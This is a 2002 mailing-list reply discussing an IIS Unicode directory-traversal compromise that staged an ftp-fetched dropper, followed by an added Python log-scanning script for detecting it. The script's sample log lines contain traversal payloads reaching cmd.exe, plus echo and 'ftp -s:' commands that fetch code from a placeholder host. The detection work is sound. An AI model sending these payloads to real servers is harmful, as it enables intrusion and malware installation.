Cody,

Of all of the responses I've seen so far, yours is by far the most informative. Thanks.

> I saw a Win2000 machine rooted just last week by an autorooter taking
> advantage of the pre-10pack rollup Microsoft put out just recently. It
> was hacked through a Unicode attack by an auto-rooter from Russia,
> connected to an ftp site in Moscow and downloaded a file named "lb.exe",

I guess the specifics are that, using the dir traversal exploit (patch published in Nov '00...ouch!), this autorooter sent echo commands to the system to create and launch the ftp script file. Do you have a copy of "lb.exe", by chance?

> which, when run connects to an IRC server in Moscow, loads an
> auto-rooter with a list of servers to attack, and hides the processes
> from netstat, Program Manager, etc. It was pretty slick.

This is interesting. First off, neither netstat nor Program Manager show process information, so hiding process info from them isn't tough. I'm going to assume you mean Task Manager...but again, that's an API call to hide a process from TM. Netstat on XP will show process info, but not on NT/2K.

I'd be interested in getting a copy of lb.exe to look at, or some more specifics on this ability to hide processes you mentioned...

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 15:47:02 PDT
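The thread describes the compromise only in prose: a Unicode-encoded directory traversal to reach cmd.exe, a series of echo commands that write an ftp script to disk, and an ftp run that fetches the dropper. The script below is an added example, not part of the original post or of any tool the posters mention, showing how an incident handler could pull those three steps out of IIS web logs. It assumes the W3C log field order date, time, client IP, method, URI stem, URI query and status, models the vulnerable decoder simply as "collapse an 0xC0 or 0xC1 lead byte with the next byte into one ASCII character" (an assumption, not an exact reimplementation of IIS), and runs over a few constructed log lines embedded in the file.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-style log lines (not real data). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2002-04-30 03:12:07 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2002-04-30 03:12:09 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+open+10.0.0.9+21>>x.txt 200
2002-04-30 03:12:12 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+ftp+-s:x.txt 200
2002-04-30 03:13:00 10.0.0.22 GET /default.htm - 200
2002-04-30 03:13:05 10.0.0.22 GET /images/%c3%a9.gif - 404
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")
CMD_EXE = re.compile(r"cmd\.exe", re.I)
# "echo ... >" builds a script on disk; "ftp -s:" replays it.
DROPPER = re.compile(r"\becho\b.*>|\bftp\b.*-s:", re.I)


def lenient_decode(uri: str) -> str:
    """Percent-decode, then fold an overlong 2-byte sequence (lead byte 0xC0 or
    0xC1, invalid in strict UTF-8) into a single ASCII character, the way the
    unpatched IIS decoder effectively did. Simplified model, an assumption:
    %c0%af -> '/', %c1%9c -> '\\'. Other non-ASCII bytes become '?'."""
    raw = unquote_to_bytes(uri)
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "?")
            i += 1
    return "".join(out)


def classify(stem: str, query: str) -> list:
    """Tag one request. Traversal is judged on the *decoded* stem, so the
    Unicode disguise does not hide it; the dropper pattern is judged on the
    query only when the request already reached cmd.exe via traversal."""
    decoded = lenient_decode(stem)
    tags = []
    if TRAVERSAL.search(decoded) and CMD_EXE.search(decoded):
        tags.append("unicode-traversal-cmd")
        if DROPPER.search(query.replace("+", " ")):
            tags.append("ftp-script-dropper")
    return tags


def scan(log_text: str) -> list:
    """Return (client IP, raw stem, tags) for every suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = parts[:7]
        tags = classify(stem, query)
        if tags:
            alerts.append((ip, stem, tags))
    return alerts


if __name__ == "__main__":
    for ip, stem, tags in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(tags))
```

The point of decoding before matching is the one the post hints at: a signature for the literal string "../" never fires on these requests, because the traversal only appears after the server's own lenient decoder has run. Matching "echo" with a redirect, and "ftp -s:", on the same source address within a few seconds is what turns a noisy traversal alert into the "dropper staged via ftp script" story described above.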